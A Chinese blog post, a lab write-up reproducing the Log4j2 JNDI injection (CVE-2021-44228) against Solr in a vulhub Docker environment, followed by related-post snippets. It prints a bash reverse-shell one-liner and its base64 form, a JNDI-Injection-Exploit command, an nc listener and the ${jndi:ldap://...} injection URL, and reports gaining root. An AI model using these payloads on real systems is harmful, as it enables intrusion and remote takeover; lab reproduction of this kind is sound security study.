vulhub靶场log4j2漏洞复现

于 2024-09-08 18:01:23 发布
阅读量309 收藏 5
点赞数 4
文章标签: log4j web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2893992091/article/details/142029598
版权

前提:

漏洞名称:Apche log4j远程代码执行漏洞

漏洞编号:CVE-2021-44228

靶场:vulhub

用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令:

docker-compose up -d 开启环境

docker ps 查看端口信息

端口开在8983,访问网站,环境搭建成功

在DNSLOG平台上获取⼀个域名来监控我们注⼊的效果

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI 项⽬地址

Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub 

反弹 shell

bash -i >& /dev/tcp/172.16.1.13/6666 0>&1 

反弹 Shell-base64 加密YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

命令模板

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.13"

 

服务器监听

nc -lvvp 6666

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址

http://ip地址:8983/solr/admin/cores?action=${jndi:ldap://172.16.1.13:1389/yhlt2h}

将红字替换成JDK1.8的ldap

去另外⼀个监控终端看看shell有没有弹回来且⽤whoami 命令查看权限,发现已经成功获取到root权限了。⼤功告成

无敌的俊哥
关注
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1699
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
log4j2核弹级漏洞靶场复现(反弹shell)
m0_56773673的博客
01-04 4147
十分钟log4j2靶场漏洞复现!!!
Vulhub靶场-Log4j2
最新发布
weixin_69010236的博客
01-24 1284
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
vulhublog4j
haoaaao的博客
05-02 1323
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 2、搭建 docker 3、复现 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2997
vulhubLog4j2:CVE-2021-44228漏洞复现
vulhubapache log4j2(CVE-2021-44228)漏洞复现
weixin_48739941的博客
04-11 1386
(1)原理:Apache Log4j 2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。该漏洞一旦被攻击者利用会造成严重危害。 (2)cd vulhub/log4j/CVE-2021-44228 切换目录。 (3)docker-compose up -d 启动。 访问:http://
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 2006
vulhub漏洞复现练习篇
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2456
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
Vulhub靶场Gogs 任意用户登录漏洞复现
X_python321的博客
08-04 1211
复现踩的坑 这篇文章没准能帮你
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3820
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 3万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1302
vulhub-log4j漏洞复现
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 1040
log4j 反序列化、远程代码执行漏洞
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1490
LOG4J2(CVE-2021-44228)vulhub复现
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
我了解豹女就像农民伯伯了解大米
03-17 6085
Log4j2端口3839页面 http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1 去提交dnslog payload参数: http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn} Dnslog中检测到信息,.
log4j-CVE-2021-44228-vulhub复现
crowsec
12-20 4972
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01漏洞描述 Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考地址: https://github.com/vulhub/vulhub 本次漏洞复现也是基于Vulhub 02漏洞环...
(环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
daxi0ng的博客
12-10 1万+
0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x02环境搭建 1、创建一个新的maven项目,并导入Log4j的依赖包 <depe...
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值